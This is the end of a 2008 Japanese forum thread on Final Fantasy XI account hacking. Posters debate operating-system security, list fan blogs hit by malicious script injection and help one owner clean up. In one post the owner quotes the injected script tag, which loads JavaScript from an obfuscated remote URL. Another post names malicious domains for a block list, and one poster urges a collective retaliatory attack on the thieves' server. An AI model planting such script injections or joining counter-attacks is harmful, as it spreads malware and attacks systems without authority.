915 :既にその名前は使われています:2008/03/25(火) 19:59:52.37 ID:b1jIPTS8
セキュ板じみてきた

916 :既にその名前は使われています:2008/03/25(火) 20:00:01.66 ID:n1eE+/LN
javaって未来神話だろ

917 :既にその名前は使われています:2008/03/25(火) 20:01:12.66 ID:EH31oboY
>>914
実際問題としてMacなんか狙わなくても勝手に爆弾マーク出して
自爆フリーズしてたし


918 :既にその名前は使われています:2008/03/25(火) 20:01:38.61 ID:g3q+JrZV
窓口が24時間開けられないってんなら
ログイン専用の簡単アカウントを公式HP上で売って欲しい。ウェブマネー支払いのやつ
ログインした先が監獄でGM呼べるだけの仕様。んですぐに対応GMが登場
本人ログインでないとアカ凍結無理とか言うならこれくらいカカッとやるべきでしょう

ほんとは窓口開けてて欲しいけど


919 :既にその名前は使われています:2008/03/25(火) 20:02:31.24 ID:HImxVR+r
>>911
……あのさ、Linuxってデフォの状態でapacheとか
sshdとかsendmailは知らんがpostfixとか色々入ってんでしょ?
デスクトップ用途だろうが入ってる事がとても多いよね?
で、ポートが開いてて、セキュリティホールが開いたバージョン
のソフトがあると、そこを突かれるじゃない?
これの事を言ってるんだが理解できるか?

サーバ用途としてはメジャー、ひいてはそんなにマイナーOSじゃないって
言ってるんだが、何でそういう読み方するのか分からんwww
国語力の問題か?

920 :既にその名前は使われています:2008/03/25(火) 20:02:41.78 ID:WwwlshuC
ハンバーガー食いたくなった、ちょっと出かけてくる。

921 :既にその名前は使われています:2008/03/25(火) 20:04:33.91 ID:BmZIqiMR
>>918
POLからでもGM呼べるから
ゲームのアカウントはいらない
必要なのはPOL垢のみ

レジコさえあれば垢作るのは無料、レジコはゲームと抱き合わせだがな

922 :既にその名前は使われています:2008/03/25(火) 20:05:47.28 ID:iZibIXDg
ID:cG7zxlfp
これいつものマカー?
イラクとか言い出すところとか似てる。

923 :既にその名前は使われています:2008/03/25(火) 20:06:38.70 ID:J6HuyFWS
>>922
前スレからしか読んでないけどいつものひとでしょ。

924 :既にその名前は使われています:2008/03/25(火) 20:06:55.33 ID:BmZIqiMR
MacOSもオープンソース開発な技術が多いから
LinuxやBSDと共通のセキュリティホールが発見される事が
まれによくある

狙われた瞬間に終わるだろうな、まだ狙われていないだけ

925 :既にその名前は使われています:2008/03/25(火) 20:10:55.56 ID:CPKgTWTl
>>922
サクっとNGIDに登録した。

926 :既にその名前は使われています:2008/03/25(火) 20:11:36.71 ID:bO1/wplc
ウィルスに感染してない状態で、カスペルスキーのキーロガー検知を有効にして、
POLだけ信頼ゾーンに追加して、パスは手打ち入力にしているのですが、
これって一応キーロガー対策になってますか?

927 :既にその名前は使われています:2008/03/25(火) 20:12:01.48 ID:HImxVR+r
>>914
結局は、WindowsだろうがMacだろうがLinuxだろうが、
ウィルスを作る仕組み自体に大差ないって知ってる奴は気を付けるし、
知らん奴は胡座かいて笑って過ごすんじゃない?

ウィルスを作るのがそれほど難しくないって知っていれば、
マイナーOSだから、なんて言ってられんよ。
ちょっと気紛れな奴がいただけで終了だからな。

928 :既にその名前は使われています:2008/03/25(火) 20:13:43.27 ID:EH31oboY
>>927
ウィルス書くような精神構造の人間は大抵マカーで子供の名前が魚頭似悪

929 :既にその名前は使われています:2008/03/25(火) 20:15:13.53 ID:QZorvCQo
↓ここで垢ハック多発の現状リークしてあげると喜ばれるかもね

株式板で「ゲーム株」を語ろう! PART95
http://live27.2ch.net/test/read.cgi/stock/1203806757/

930 :既にその名前は使われています:2008/03/25(火) 20:17:57.64 ID:rvQA3x19
光だとLAN繋ぐとこ4箇所あるんだけど、これもPS?あぶないん?

931 :既にその名前は使われています:2008/03/25(火) 20:18:19.85 ID:VfKn+jGK
>>916
ジャーヴァス乙

932 :既にその名前は使われています:2008/03/25(火) 20:18:35.82 ID:avAH3FeL
RMTしてる奴吊るし上げようぜ

933 :既にその名前は使われています:2008/03/25(火) 20:21:10.45 ID:CW+juqyk
垢ハックは、クレカとか現金関係のほうが先じゃないか?

…より狙いやすい鴨としてゲーム垢が狙われてるだけで、会社全体の業績に響く話でもない気はするんだが……

934 :既にその名前は使われています:2008/03/25(火) 20:24:25.91 ID:ZtyWb1Kb
>>877
全然重箱の隅じゃないぞ
FF厨にわかるように例えると、リディルと青龍刀一緒にしてるぐらい乱暴な話だ

935 :既にその名前は使われています:2008/03/25(火) 20:27:38.59 ID:rNeX04xY
MACを無責任に進めるのは教義だから仕方がないとして、テンプレにかかれてる事も
わからず質問責めの人らがMAC上でFF11動かせるわけもないよ。

動かせるならウイン上の仮想環境でブラウジングできるからMACの必要が・・・


98・ME・2000の連中はIE6までだから今すぐオペラか炎狐にとか現実的な話しようや。

936 :既にその名前は使われています:2008/03/25(火) 20:27:39.19 ID:EH31oboY
>>934
複数回攻撃武器の話ししてんのに青龍刀が出てくるなんて乱暴な人ですね^^;

937 :既にその名前は使われています:2008/03/25(火) 20:28:14.89 ID:Z+XAiyMG
今危ないブログ一覧で
初心者の館をぴょん基地で見ると罠スクリプトが見えるけど…どうなの?
あと、ある黒は、トップじゃなくて猛進転進関連の記事だっけ?どれかわからない

938 :既にその名前は使われています:2008/03/25(火) 20:28:46.35 ID:h6tBVEeV
Macなら大丈夫とか、ねらわれてない、とか頭がお花畑すぎて話にならんね。
Windowsがこれだけねらわれてるのを見れば、まともな神経をしてれば
明日は我が身、として対策を取るのが普通だろう。
今回のアカハックとかだって、それだけじゃないにせよ、これと同じような自分は大丈夫^^、
なんて根拠のない思いこみによるものだっていくつもあるんだろう。

ウィルスソフトを入れてないけど安全^^、とか気が狂ってるとしか思えないし、
そういうやつに限って感染したときに他人のせいにして騒ぎまくるんだよな。
本当に迷惑だ。


939 :既にその名前は使われています:2008/03/25(火) 20:33:42.86 ID:K2j+2VzG
>>917
そういう時代もあったねw なつかしすぎるw

940 :既にその名前は使われています:2008/03/25(火) 20:34:42.06 ID:K2j+2VzG
>>911
それをいうならMacもデフォでapacheとかsshdとかいろいろ入ってる件w

941 :既にその名前は使われています:2008/03/25(火) 20:35:49.02 ID:HImxVR+r
Mac OS XはカーネルはMachベースのマイクロカーネルだけど、
ユーザランドはFreeBSDだかNetBSDだかが由来…

そして、この両OSは手放しで安全だとは思われていないし、
実際にセキュリティ勧告なども幾度となく行われている…

……あとは分かるな?

942 :既にその名前は使われています:2008/03/25(火) 20:38:45.59 ID:jCEnmjMT
Winと比べるとMacは相対的に安全なことは確かだがな。
だが、それはセキュリティホールがないから、という理由ではなく、
だれもMacなんて狙わないから、というのが理由。

理由はどうあれ、現状ではMacはWinの10億倍くらい安全なのは同意。

943 :既にその名前は使われています:2008/03/25(火) 20:40:13.83 ID:koi/gaM5
で、ネ実でそんな話してて垢ハックを防ぐ事に繋がるのか?

専門的な話がしたいなら他所にいけ。

944 :既にその名前は使われています:2008/03/25(火) 20:41:04.06 ID:KvRYpdDq
>>937
今現在修正されていないのは『FF11初心者の館』。見に行かない方が良いと思われ。他は既に修正済み。

fc2blogでもう1つ見つかったそうなので追加しました。あと修正されていないblogを別にしてみました。
ある黒魔道士の軌跡さんの所はJavaスクリプトだったみたいなので修正しました。
修正・補完あればよろしくです。

■過去改竄被害blog一覧
 黒猫奮闘記(インラインフレーム・1回改竄され修正済み)
 ぺってん(インラインフレーム・1回改竄され修正済み)
 戦士スキー(インラインフレーム・2回改竄され修正済み)
 某青魔道士(インラインフレーム・2回改竄され閉鎖)
 ペコろぐ。(Javaスクリプト・1回改竄され修正済み)
 ヴァナモンblog(Javaスクリプト・1回改竄され修正済み)
 ある黒魔道士の軌跡(Javaスクリプト・1回改竄され修正済み)
 Lostfr【誰か】かまって【くれませんか?】(Javaスクリプト・1回改竄され修正済み)
 FINAL FANTASY XI 散策日記(インラインフレーム・1回改竄され修正済み)
■現在改竄され危険なblog一覧
 FF11初心者の館(Javaスクリプト:改竄されてウィルスまきちらし中)

945 :既にその名前は使われています:2008/03/25(火) 20:41:43.36 ID:jCEnmjMT
>>943
WindowsでバカみたいにFF関連ブログを踏みまくるから
垢ハックツールに感染するんだろ。
それに感染しないようにするにはどうしたらいいか
という論点なのでこのスレでもっと議論すべきだと思うが。

946 :既にその名前は使われています:2008/03/25(火) 20:41:45.67 ID:q62AJNVt
今月のSTTの報告でなにかしら注意喚起するかと思ったら、いままでのコピペかよ・・・

ほんとこのまま知らんふりで通すきがしてきた・・・

947 :既にその名前は使われています:2008/03/25(火) 20:42:15.26 ID:YXNsqHr5
しねよ糞業者

948 :既にその名前は使われています:2008/03/25(火) 20:42:53.99 ID:Ye7Gdd+p
今、このタイミングで規約違反一斉対処って実は一番怖いこと何じゃ無いだろうか・・・

949 :既にその名前は使われています:2008/03/25(火) 20:44:20.16 ID:MO2VdhzH
WindowsでIE7インスコしたら最初から検索サイトがgoogle以外選択できないようになってて
そこで調べものすると必ずへんなサイトにジャンプするようになってたのには
驚いた

950 :既にその名前は使われています:2008/03/25(火) 20:46:27.83 ID:iZibIXDg
それはない。デフォはMicrosoftのLiveSearchのはずだぞ。

951 :既にその名前は使われています:2008/03/25(火) 20:48:07.59 ID:lzAZqpVk
これってブログ管理会社に対応をお願いするのが被害を抑える
最初のアクションじゃね?

952 :既にその名前は使われています:2008/03/25(火) 20:48:52.44 ID:HImxVR+r
>>943
安易に「〜なら安心」とか言われると、何も知らない人がそれを信じて、
対策を怠ってしまうのが心配なんだよ。現に、対策を怠ったからこそ、
パスワードを盗まれてしまっているわけなんだから。

何を使っていても、使い方次第では危ない、ってことを分かっていてくれれば、
使ってるのがWinだろうがMacだろうがLinuxだろうがどうでもいい。

953 :既にその名前は使われています:2008/03/25(火) 20:49:12.00 ID:6FGel866
FireFoxでIEのお気に入りを使うって、なんか最初の設定で普通にできたような気がするが。
まあブックマークになるわけだが。
クッキーとかも問題なく移行できたな。俺の場合。

954 :既にその名前は使われています:2008/03/25(火) 20:50:21.77 ID:g3q+JrZV
>>951
やったけど
積極的な対応はないみたいよ

955 :既にその名前は使われています:2008/03/25(火) 20:51:40.90 ID:plSQZiBa
ハックされる→根こそぎ盗られて業者活動に使われるor鯖移動して〃→
業者認定されてBAN
ありえるの?

956 :既にその名前は使われています:2008/03/25(火) 20:51:54.56 ID:pn98/92E
>>945
バカみたいにッて言うか普通blog書く・読む連中ってハシゴしてるモンじゃないの?

>>946
状況は何も変わってないからなw

>>948
垢ハック被害者の一部は確実に不正者としてban喰らってるなw

957 :既にその名前は使われています:2008/03/25(火) 20:52:31.13 ID:Z+XAiyMG
>>944 ありがとう

958 :既にその名前は使われています:2008/03/25(火) 20:54:10.41 ID:OoZjY94u
今回の一番の問題は住所などの個人情報が業者の手に渡っているということ。
個人情報流出の原因は明らかに■の責任。■は違法企業。
不正アクセス禁止法5条 アクセス管理者による防御措置を怠っている。
■は早急に 
1 24時間対応窓口。
2 時代にあったパスワード新技術の開発。
3 パスワードのHDD保存による個人情報漏洩の公式謝罪が必要

959 :既にその名前は使われています:2008/03/25(火) 20:54:31.97 ID:l3bKh9kN
ついに垢ハックの被害者になってしまった俺。GM、サポセンに電話して警察いけと言われたが
アイテム返却は無理っつーから警察いく気もおきねえや・・・

960 :既にその名前は使われています:2008/03/25(火) 20:58:10.88 ID:rvQA3x19
なぜハックしたキャラのパスを複数変更するかについて、考えてみないか?

複数変更しないと何かがだめだと言うことになるが

961 :既にその名前は使われています:2008/03/25(火) 20:58:51.55 ID:OoZjY94u
不正アクセス禁止法、個人情報保護法にも違反してる■を絶対に許すな

962 :既にその名前は使われています:2008/03/25(火) 21:00:03.10 ID:A8y1OmVA
>959
無理かもしれないが、被害拡大してから結局対応する事になる場合だってあるだろうし
その時になって警察に被害届けだしてなかったって理由で対象外になるかもだぜ?

963 :既にその名前は使われています:2008/03/25(火) 21:02:20.88 ID:m/D4jrBz
これだけ何も公式見解がないと、
業者放置して、身ぐるみ剥がされたプレイヤーをBANして点数稼ぎウマー
が真の狙いなんじゃないかと思えてきた。

964 :既にその名前は使われています:2008/03/25(火) 21:04:01.03 ID:MO2VdhzH
>>950
ないんじゃなくてそういう動きさせるウイルスが
ソフトも入れる前から既に侵入してるOSってことだよ

965 :既にその名前は使われています:2008/03/25(火) 21:07:10.15 ID:FyPJQlKA
IDとパスを入手するための送信先サーバってあるよね?
アドレス調べて、ネ実民でアタックしまくるとかできないかね。

とりあえず時間稼ぎとしてはいけるかも。

後はPGの人が解析して、偽データをサーバに超送信しまくるとか。

966 :既にその名前は使われています:2008/03/25(火) 21:10:05.39 ID:auLaoDR9
ツールとかRMTしてる奴は垢ハックされても文句言うなよっ!o(`ω´*)o

967 :既にその名前は使われています:2008/03/25(火) 21:14:04.74 ID:l3bKh9kN
PS2でやってるから安心してたのにハックくらった俺^q^

968 :Afian:2008/03/25(火) 21:17:19.18 ID:lGBw8Ste
FF11初心者の館ブログ管理人Afianです。
ブログには一時的に規制を掛けました。
ご迷惑をおかけいたしまして誠に申し訳ありません。

969 :既にその名前は使われています:2008/03/25(火) 21:19:53.54 ID:2UE3q0B9
>>968
気付いてくれてよかったよ、ご苦労さん

970 :既にその名前は使われています:2008/03/25(火) 21:21:53.40 ID:auLaoDR9
あふぃあんo(`ω´*)o

971 :Afian:2008/03/25(火) 21:28:50.52 ID:lGBw8Ste
テンプレートを確認しましたところ
<!--/edit_area-->
<script language="javascript" src="h〇〇p://://%77%77%77%2E〜〜〜"></script>
とありましたが、これが原因でしょうか。

972 :既にその名前は使われています:2008/03/25(火) 21:30:25.86 ID:KvRYpdDq
>>968
おぉ、気づいてもらえたようで何より。

■過去改竄被害blog一覧
 黒猫奮闘記(インラインフレーム・1回改竄され修正済み)
 ぺってん(インラインフレーム・1回改竄され修正済み)
 戦士スキー(インラインフレーム・2回改竄され修正済み)
 某青魔道士(インラインフレーム・2回改竄され閉鎖)
 ペコろぐ。(Javaスクリプト・1回改竄され修正済み)
 ヴァナモンblog(Javaスクリプト・1回改竄され修正済み)
 ある黒魔道士の軌跡(Javaスクリプト・1回改竄され修正済み)
 Lostfr【誰か】かまって【くれませんか?】(Javaスクリプト・1回改竄され修正済み)
 FINAL FANTASY XI 散策日記(インラインフレーム・1回改竄され修正済み)
 FF11初心者の館(Javaスクリプト・1回改竄され修正中)

973 :既にその名前は使われています:2008/03/25(火) 21:30:49.18 ID:2ndcMiEt
>>948
垢ハックのタゲ反らしとガス抜き

974 :既にその名前は使われています:2008/03/25(火) 21:31:04.11 ID:KvRYpdDq
>>971
そこの箇所ですねー。

975 :既にその名前は使われています:2008/03/25(火) 21:33:28.49 ID:koi/gaM5
>>945
んで、一般市民がセキュリティホールがあーだこーだと答弁することが
被害拡大を防ぐのか・・・大した持論だな。

976 :既にその名前は使われています:2008/03/25(火) 21:35:15.40 ID:CJuWmpLQ
次スレ立ってる?
まだならいつでも立てられるけどテンプレとか直さないといかんよねこれは。

977 :Afian:2008/03/25(火) 21:36:59.25 ID:lGBw8Ste
>>974
ありがとうございます、その箇所を削除させていただきました。
削除はしたんですが、再度公開していいものなのか・・・不安です。

978 :既にその名前は使われています:2008/03/25(火) 21:37:08.58 ID:FyPJQlKA
俺も●持ってるから多分立てれるけど、テンプレわからんので様子見てた

979 :既にその名前は使われています:2008/03/25(火) 21:37:44.88 ID:2UE3q0B9
PG2のリネ資料室製のNGリストにはhellh■netとfccja■comは入ってるから
導入できる環境なら極力入れておいたほうがいいかもしれん

ところでそろそろ新すれ用意の季節です

980 :既にその名前は使われています:2008/03/25(火) 21:38:32.08 ID:iZibIXDg
>>977
とりあえず公開しなきゃ第三者が検証できんよ。
後は自分で決めなされ。

981 :既にその名前は使われています:2008/03/25(火) 21:41:13.91 ID:CJuWmpLQ
>>874-875を適当なとこにはさんでおくか。
いいかげん980越えるし。

982 :既にその名前は使われています:2008/03/25(火) 21:42:48.08 ID:koi/gaM5
>>977
まだ、不安が残るならやめて置いたほうがいいと思うよ。

983 :既にその名前は使われています:2008/03/25(火) 21:43:53.87 ID:37UEWRFJ
>>977
改竄後に、FC2のログインパス変更してないなら、
変えておいたほうがいいかも。

984 :既にその名前は使われています:2008/03/25(火) 21:44:19.08 ID:rNeX04xY
有志がちょこちょこ書き込んでた炎狐とオペラの最低限の設定もあった方がいいかも。

985 :既にその名前は使われています:2008/03/25(火) 21:46:03.28 ID:fAiOj5Ix
>>977
自分とこのマシンのウィルスチェックをするなりしてから中華・韓国あたりを遮断しパス変更して公開すればいいんじゃね?
それでもまた改竄されるならfc2そのものが怪しいわけだし。

986 :既にその名前は使われています:2008/03/25(火) 21:47:29.65 ID:fAiOj5Ix
そういえばちょっと前に
「中華サイトでうちのサイトをクラックする人を募集するような書き込みがあって不安」とかいうようなカキコなかったけ?

987 :既にその名前は使われています:2008/03/25(火) 21:50:19.84 ID:vFPHu9Hl
>>986
それって「リネージュ資料室」じゃなかったっけ?


988 :既にその名前は使われています:2008/03/25(火) 21:50:24.07 ID:CJuWmpLQ
●● RMT業者の垢ハックが多発している件15 ●●
http://live27.2ch.net/test/read.cgi/ogame/1206448992/

立ててきたよー
>>874-875>>1-10を読むのがめんどくさい人のための定期張り用テンプレってことにしよう。

>>986
リネージュ資料室さんですね。

989 :既にその名前は使われています:2008/03/25(火) 21:51:27.83 ID:fAiOj5Ix
>>987>>988
さんすこ。そういえばリネ資料室さんだったか・・・

990 :既にその名前は使われています:2008/03/25(火) 21:52:54.24 ID:2UE3q0B9
>>988
おっつおっつ
埋まる前に建てられてよかった。
お祭り騒ぎは他スレでもやってくれてるから、ここは総本山というか本丸みたいな感じでいきましょい

991 :既にその名前は使われています:2008/03/25(火) 22:02:54.70 ID:b1jIPTS8
埋めるー

992 :既にその名前は使われています:2008/03/25(火) 22:04:30.30 ID:b1jIPTS8
埋まんな〜い

993 :既にその名前は使われています:2008/03/25(火) 22:04:47.77 ID:auLaoDR9
やめろ!やめるんだハレルヤ!o(`д´o)

994 :既にその名前は使われています:2008/03/25(火) 22:09:12.42 ID:oKb27/UH
>>988
テンプレ読むのが面倒くさい
>>1のリンク先読むのが面倒くさい

そういう人は放っておいてもいいんじゃないかと思う。

995 :既にその名前は使われています:2008/03/25(火) 22:11:06.15 ID:b1jIPTS8
995げっと

996 :既にその名前は使われています:2008/03/25(火) 22:13:14.57 ID:omlW/ixG
>>994
まとめも読んでね!wwww

997 :既にその名前は使われています:2008/03/25(火) 22:14:55.39 ID:J6HuyFWS
1000なら垢抜き犯罪者のHDDがカッコン。

998 :既にその名前は使われています:2008/03/25(火) 22:16:00.80 ID:2UE3q0B9
1000なら■が神BAでハック対策をする

999 :既にその名前は使われています:2008/03/25(火) 22:16:13.81 ID:XSRb3bc4
1000なら公式HPすらハック

1000 :既にその名前は使われています:2008/03/25(火) 22:17:00.24 ID:b1jIPTS8
ヒャックx10